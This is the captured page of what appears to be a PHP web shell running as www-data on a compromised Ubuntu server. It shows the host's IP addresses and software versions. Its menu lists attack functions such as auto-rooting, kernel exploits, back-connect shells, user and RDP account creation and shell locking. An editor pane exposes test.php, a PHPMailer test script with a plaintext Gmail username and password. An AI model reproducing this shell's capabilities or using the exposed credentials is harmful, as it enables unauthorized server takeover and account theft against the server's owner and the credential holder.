Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.222.161.119
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cnv /
dud /
phpmailer /
[ HOME SHELL ]
Name
Size
Permission
Action
class.phpmailer.php
78.17
KB
-rwxr-xr-x
class.pop3.php
10.14
KB
-rwxr-xr-x
class.smtp.php
24.01
KB
-rwxr-xr-x
phpmailer_doc.html
34.5
KB
-rwxr-xr-x
test.php
837
B
-rwxr-xr-x
test1.php
1.16
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : test.php
<?php ini_set("memory_limit",-1); ini_set('max_execution_time', 1400); ini_set("display_errors","On"); require("class.phpmailer.php"); $mail = new PHPMailer(); $mail->IsSMTP(); // telling the class to use SMTP $mail->Mailer = "smtp"; $mail->Host = "ssl://smtp.gmail.com"; $mail->Port = 465; $mail->SMTPAuth = true; // turn on SMTP authentication $mail->Username = "ssnatesha@gmail.com"; // SMTP username $mail->Password = "sitharam"; // SMTP password $mail->From = "email address sender"; $mail->AddAddress("email address receiver"); $mail->Subject = "First PHPMailer Message"; $mail->Body = "Hi! \n\n This is my first e-mail sent through PHPMailer."; $mail->WordWrap = 50; if(!$mail->Send()) { echo 'Message was not sent.'; echo 'Mailer error: ' . $mail->ErrorInfo; } else { echo 'Message has been sent.'; } ?>
Close